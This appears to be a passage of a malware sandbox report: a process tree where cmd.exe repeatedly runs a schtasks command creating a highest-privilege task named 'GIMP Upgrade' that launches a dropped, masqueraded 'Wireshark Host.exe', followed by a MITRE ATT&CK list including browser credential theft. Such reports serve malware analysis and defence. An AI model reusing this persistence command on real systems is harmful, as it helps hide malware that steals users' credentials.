- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1564
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:448
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1156
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:412
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3568
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:4488
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3184
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:3060
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4020
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4864
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1164
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5024
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1124
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:3788
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1636
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:4896
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2816
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:4316
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4552
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:3624
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3812
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:1648
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1872
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4848
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1036
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3736
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3096
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:940
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4880
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:2056
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4824
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5104
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3924
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3580
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1008
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1972
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3596
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:5004
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:640
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3092
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1208
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:2960

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:724

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2716

C:\Users\Public\Pictures\xdwdNode.js.exe
C:\Users\Public\Pictures\xdwdNode.js.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
PID:3696
- C:\Windows\system32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2000
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3360
- C:\Program Files\xdwdWireshark Host.exe
  "C:\Program Files\xdwdWireshark Host.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:752
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
    3⤵
    PID:3124
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
      4⤵
      PID:2652
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
    3⤵
    PID:3808
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
      4⤵
      PID:5024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery